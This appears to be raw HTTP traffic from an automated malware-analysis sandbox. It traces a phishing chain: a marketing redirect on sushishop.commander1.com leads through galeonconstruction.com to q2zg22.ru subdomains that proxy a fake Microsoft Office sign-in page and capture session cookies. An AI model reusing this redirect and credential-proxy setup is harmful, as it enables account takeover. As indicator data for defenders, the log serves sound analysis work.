fpc=Aq_odsI7GDJHm8suSWCV-X8; esctx=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Vdc2TMKN3WgRVIPG2KYMe9cKLPhl_mFvXXBfxpTirUGdlKhgqDMpWnM2_5_gD1SjljL2-mhgQ9VoUJK3J_wvKRz3Sjbi4oTarW6t9Zz7ed5ioicPhWSPqwo0BZiORSIVftWlg5DNCJFrIgBxKMsmna1gkBhhlzTVsbGcOi6THtwgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; esctx-sAcwFNXs9p0=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Xz-zY4mFOFPtOKDCtkncDgiCqiq8JSPFEneyjDU4hFCxc9yKOXR0OSKd5FYQRJM3mXeQZYPo-cw18QcWUama1nI0_hypcV18IPjbFcAN8l-2_npQ8hQ5HCn_XXMqMr00sdRCGYoSBfgWdZ8ETjE1OiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1
              Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/jsd/r/84f4c6af994b451d HTTP/1.1Host: office.q2zg22.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; fpc=Aq_odsI7GDJHm8suSWCV-X8; esctx=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Vdc2TMKN3WgRVIPG2KYMe9cKLPhl_mFvXXBfxpTirUGdlKhgqDMpWnM2_5_gD1SjljL2-mhgQ9VoUJK3J_wvKRz3Sjbi4oTarW6t9Zz7ed5ioicPhWSPqwo0BZiORSIVftWlg5DNCJFrIgBxKMsmna1gkBhhlzTVsbGcOi6THtwgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; esctx-sAcwFNXs9p0=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Xz-zY4mFOFPtOKDCtkncDgiCqiq8JSPFEneyjDU4hFCxc9yKOXR0OSKd5FYQRJM3mXeQZYPo-cw18QcWUama1nI0_hypcV18IPjbFcAN8l-2_npQ8hQ5HCn_XXMqMr00sdRCGYoSBfgWdZ8ETjE1OiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; cf_clearance=ce0oW76mtANxPk_4kyc3mBk42cWWnIOKaijg4RusDUc-1706901468-1-AeslQiFkGHYQohQV1EPcN2JU227xaAZFWW3gC7kcE9vFnxHvJuY8AnBotsMwex+qA7cxzTMhs69XAR33CiBa1pk=
              Source: global trafficHTTP traffic detected: GET /s/afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04/521393ffd6e6e26814c2481ea580df56f06a765733586ff8dc0db635147b4d9a.js HTTP/1.1Host: office.q2zg22.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424982651072914.MTc3ZWVkZGQtYTZjNy00OTZlLTgxODctYWFiZGUzNzYwM2JlNjljY2M1YzEtZjRmNy00Njg2LTk5NzctYmUyYmY1ZDhiYjVi&ui_locales=en-US&mkt=en-US&client-request-id=27340d1a-f75c-4aed-bfd4-e7d89e08f2f5&state=Yvf-XDUrjz0oeLPkq8m6wvZNNx-4HHkagqS9BhHl9kXhuZbnWeP_boVBmzqCmf36UjRbbqyVFxS6NfMPtPrMzkYT0e3eC9jdOQOPVaXsUaKvdkKS66v9CzSs89a-xvCDlX83KjhHGwLHOIpviusPB2JbXEDMaguF9u_IRWYYWRgKHLprzYpu6YRCePlMSrde_70j5tZlDSgEnKs7NwUMbr6fRrt8o-EvCVkm0FfE3NnjacnfJhuLiNnd81beGyMvkxdpyTZsYXUvoKRGU0_4ng&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0&sso_reload=trueAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; esctx-sAcwFNXs9p0=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Xz-zY4mFOFPtOKDCtkncDgiCqiq8JSPFEneyjDU4hFCxc9yKOXR0OSKd5FYQRJM3mXeQZYPo-cw18QcWUama1nI0_hypcV18IPjbFcAN8l-2_npQ8hQ5HCn_XXMqMr00sdRCGYoSBfgWdZ8ETjE1OiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; cf_clearance=ce0oW76mtANxPk_4kyc3mBk42cWWnIOKaijg4RusDUc-1706901468-1-AeslQiFkGHYQohQV1EPcN2JU227xaAZFWW3gC7kcE9vFnxHvJuY8AnBotsMwex+qA7cxzTMhs69XAR33CiBa1pk=; buid=0.AVoAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAA.AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-0b0GHFUjypDPzYyRCP-j910iLVEABaRccpLk36B5zRBtQ3fob97QdMrqXsjTd5l0xaaXKm_REXXPLeGuMeGr-7qB7U4XkFGuAUABRnZJpCMgAA; esctx=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Aetvl2btd8aqo8wzaMiV5Hf2kdb_IwSVTXuYe0uiIoKycm_q9g-RAse7WQ2x09SHTppANz6TPXL3R5FlIm2flV7nWh7dn4CXmsH-QoXUY5sWlBYRvTFD7wAAZHOGThUh_jbLwMoU4B1IcbiFQee9HxB3lxm4BtjIgZpVmvHJBF0gAA; esctx-M3Evdg9W3gI=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-JqQWhBFF3iERp8Semywl5LKbWyjZoUSF17HR6LRJwEeJzRn7zd5hZTtbNOswRWLDQ8kQv3hJMqkVu2XeDuIthdsdh_qgD7pZ2CcAHHgScJuPoGyxYFiTiJuI8--bsFrVKPZQGoqN7dxUP9axzl0FDSAA; fpc=Aq_odsI7GDJHm8suSWCV-X8
              Source: global trafficHTTP traffic detected: GET /s/afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04.js HTTP/1.1Host: office.q2zg22.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424982651072914.MTc3ZWVkZGQtYTZjNy00OTZlLTgxODctYWFiZGUzNzYwM2JlNjljY2M1YzEtZjRmNy00Njg2LTk5NzctYmUyYmY1ZDhiYjVi&ui_locales=en-US&mkt=en-US&client-request-id=27340d1a-f75c-4aed-bfd4-e7d89e08f2f5&state=Yvf-XDUrjz0oeLPkq8m6wvZNNx-4HHkagqS9BhHl9kXhuZbnWeP_boVBmzqCmf36UjRbbqyVFxS6NfMPtPrMzkYT0e3eC9jdOQOPVaXsUaKvdkKS66v9CzSs89a-xvCDlX83KjhHGwLHOIpviusPB2JbXEDMaguF9u_IRWYYWRgKHLprzYpu6YRCePlMSrde_70j5tZlDSgEnKs7NwUMbr6fRrt8o-EvCVkm0FfE3NnjacnfJhuLiNnd81beGyMvkxdpyTZsYXUvoKRGU0_4ng&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0&sso_reload=trueAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; esctx-sAcwFNXs9p0=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Xz-zY4mFOFPtOKDCtkncDgiCqiq8JSPFEneyjDU4hFCxc9yKOXR0OSKd5FYQRJM3mXeQZYPo-cw18QcWUama1nI0_hypcV18IPjbFcAN8l-2_npQ8hQ5HCn_XXMqMr00sdRCGYoSBfgWdZ8ETjE1OiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; cf_clearance=ce0oW76mtANxPk_4kyc3mBk42cWWnIOKaijg4RusDUc-1706901468-1-AeslQiFkGHYQohQV1EPcN2JU227xaAZFWW3gC7kcE9vFnxHvJuY8AnBotsMwex+qA7cxzTMhs69XAR33CiBa1pk=; buid=0.AVoAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAA.AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-0b0GHFUjypDPzYyRCP-j910iLVEABaRccpLk36B5zRBtQ3fob97QdMrqXsjTd5l0xaaXKm_REXXPLeGuMeGr-7qB7U4XkFGuAUABRnZJpCMgAA; esctx=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Aetvl2btd8aqo8wzaMiV5Hf2kdb_IwSVTXuYe0uiIoKycm_q9g-RAse7WQ2x09SHTppANz6TPXL3R5FlIm2flV7nWh7dn4CXmsH-QoXUY5sWlBYRvTFD7wAAZHOGThUh_jbLwMoU4B1IcbiFQee9HxB3lxm4BtjIgZpVmvHJBF0gAA; esctx-M3Evdg9W3gI=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-JqQWhBFF3iERp8Semywl5LKbWyjZoUSF17HR6LRJwEeJzRn7zd5hZTtbNOswRWLDQ8kQv3hJMqkVu2XeDuIthdsdh_qgD7pZ2CcAHHgScJuPoGyxYFiTiJuI8--bsFrVKPZQGoqN7dxUP9axzl0FDSAA; fpc=Aq_odsI7GDJHm8suSWCV-X8
              Source: global trafficHTTP traffic detected: GET /ests/2.1/content/cdnbundles/converged.v2.login.min_1ito3russhq-9gioj-zd4w2.css HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://office.q2zg22.rusec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://office.q2zg22.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/ConvergedLogin_PCore_rT0zkaZkTfaSAkKPThHEog2.js HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://office.q2zg22.rusec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://office.q2zg22.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_pwhoosk_q-bz40xlez3ihq2.js HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://office.q2zg22.rusec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://office.q2zg22.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /Me.htm?v=3 HTTP/1.1Host: ywnjb.q2zg22.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://office.q2zg22.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; cf_clearance=ce0oW76mtANxPk_4kyc3mBk42cWWnIOKaijg4RusDUc-1706901468-1-AeslQiFkGHYQohQV1EPcN2JU227xaAZFWW3gC7kcE9vFnxHvJuY8AnBotsMwex+qA7cxzTMhs69XAR33CiBa1pk=
              Source: global trafficHTTP traffic detected: GET /c3?firsttime=1&tcs=2478&chn=emailing&src=neolane&cmp=20231127_email_relance_app30_befr&cty=be&med=actu&url=//galeonconstruction.com/nin/niit HTTP/1.1Host: sushishop.commander1.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: tc_cj_v2=%20%28%7B%24%27%24%29%22ZZZ%29%20%2A%27%7B%29%20ZZZKQJPSJKNPKJJJZZZ%5Dfc%5De; tc_cj_v2_cmp=LJLMKKLQy%20%28%7B%24%27y-%20%27%7B%29%7D%20y%7B%2B%2BMJy%7C%20%21-; tc_cj_v2_med=%7B%7D%2F0; TCID=16fae09848cf2bf078ca3f065e274a8a; TCSESSION=20240202201741992404317; TCREDIRECT=1; TCREDIRECT_DEDUP=1
              Source: global trafficHTTP traffic detected: GET /nin/niit/ HTTP/1.1Host: galeonconstruction.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /mail/inbox/ HTTP/1.1Host: microsoft-d2vkbmvzwzgf.q2zg22.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://galeonconstruction.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; cf_clearance=ce0oW76mtANxPk_4kyc3mBk42cWWnIOKaijg4RusDUc-1706901468-1-AeslQiFkGHYQohQV1EPcN2JU227xaAZFWW3gC7kcE9vFnxHvJuY8AnBotsMwex+qA7cxzTMhs69XAR33CiBa1pk=
              Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://office.q2zg22.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_6a0a7b7c69bd86706a39.js HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://office.q2zg22.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/jsd/r/84f4c6c0cc52672b HTTP/1.1Host: office.q2zg22.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; esctx-sAcwFNXs9p0=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Xz-zY4mFOFPtOKDCtkncDgiCqiq8JSPFEneyjDU4hFCxc9yKOXR0OSKd5FYQRJM3mXeQZYPo-cw18QcWUama1nI0_hypcV18IPjbFcAN8l-2_npQ8hQ5HCn_XXMqMr00sdRCGYoSBfgWdZ8ETjE1OiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=0.AVoAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAA.AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-0b0GHFUjypDPzYyRCP-j910iLVEABaRccpLk36B5zRBtQ3fob97QdMrqXsjTd5l0xaaXKm_REXXPLeGuMeGr-7qB7U4XkFGuAUABRnZJpCMgAA; esctx=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Aetvl2btd8aqo8wzaMiV5Hf2kdb_IwSVTXuYe0uiIoKycm_q9g-RAse7WQ2x09SHTppANz6TPXL3R5FlIm2flV7nWh7dn4CXmsH-QoXUY5sWlBYRvTFD7wAAZHOGThUh_jbLwMoU4B1IcbiFQee9HxB3lxm4BtjIgZpVmvHJBF0gAA; esctx-M3Evdg9W3gI=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-JqQWhBFF3iERp8Semywl5LKbWyjZoUSF17HR6LRJwEeJzRn7zd5hZTtbNOswRWLDQ8kQv3hJMqkVu2XeDuIthdsdh_qgD7pZ2CcAHHgScJuPoGyxYFiTiJuI8--bsFrVKPZQGoqN7dxUP9axzl0FDSAA; fpc=Aq_odsI7GDJHm8suSWCV-X8; brcap=0; cf_clearance=DGVCDqJo4p8HXwiT2d9w7JleZ4qt8BY6c2qPP4YgtPs-1706901470-1-Acw5T7KtW0gzkNpwcfV200Vk3xmGo+jR5De1FJxtB8nNFB0tvSoBxYcHLUPxaQHxfbpp+xPD48APvvJqR81dSEE=
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: office.q2zg22.ruConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://galeonconstruction.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; esctx-sAcwFNXs9p0=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Xz-zY4mFOFPtOKDCtkncDgiCqiq8JSPFEneyjDU4hFCxc9yKOXR0OSKd5FYQRJM3mXeQZYPo-cw18QcWUama1nI0_hypcV18IPjbFcAN8l-2_npQ8hQ5HCn_XXMqMr00sdRCGYoSBfgWdZ8ETjE1OiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=0.AVoAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAA.AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-0b0GHFUjypDPzYyRCP-j910iLVEABaRccpLk36B5zRBtQ3fob97QdMrqXsjTd5l0xaaXKm_REXXPLeGuMeGr-7qB7U4XkFGuAUABRnZJpCMgAA; esctx=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Aetvl2btd8aqo8wzaMiV5Hf2kdb_IwSVTXuYe0uiIoKycm_q9g-RAse7WQ2x09SHTppANz6TPXL3R5FlIm2flV7nWh7dn4CXmsH-QoXUY5sWlBYRvTFD7wAAZHOGThUh_jbLwMoU4B1IcbiFQee9HxB3lxm4BtjIgZpVmvHJBF0gAA; esctx-M3Evdg9W3gI=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-JqQWhBFF3iERp8Semywl5LKbWyjZoUSF17HR6LRJwEeJzRn7zd5hZTtbNOswRWLDQ8kQv3hJMqkVu2XeDuIthdsdh_qgD7pZ2CcAHHgScJuPoGyxYFiTiJuI8--bsFrVKPZQGoqN7dxUP9axzl0FDSAA; fpc=Aq_odsI7GDJHm8suSWCV-X8; brcap=0; cf_clearance=DGVCDqJo4p8HXwiT2d9w7JleZ4qt8BY6c2qPP4YgtPs-1706901470-1-Acw5T7KtW0gzkNpwcfV200Vk3xmGo+jR5De1FJxtB8nNFB0tvSoBxYcHLUPxaQHxfbpp+xPD48APvvJqR81dSEE=
              Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_d513b6f0c9182bbf1e0f.js HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://office.q2zg22.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://office.q2zg22.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://office.q2zg22.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /login HTTP/1.1Host: react.q2zg22.ruConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://galeonconstruction.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; OH.DCAffinity=OH-ncu; OH.FLID=3541f66b-883d-474b-bada-1a5283ac2b01; .AspNetCore.OpenIdConnect.Nonce.BRvn3rzs0Fx_5xNILFknFSSGI5dXEmlBcn5X4QQ5QNlpVA6xeyBo_TJU2OfpJht4BiCRzFIPH4bMFRDqEyTVjaZ2vDv7O_B4abCma5RBRx4Ndlh8JAATMmjPEIgN1oafSJwkR_LDft6kYxxy01P2lvV6MSC7Hvtja9dxg7BUVA8dRhbZAcJ1hnTAs_6OtRDmQTi0fKrNrlyScAHbPcPqoJsTbkjgW-_C91YCKA92gmhFBpHie-DakzShY8oeu_La=N; 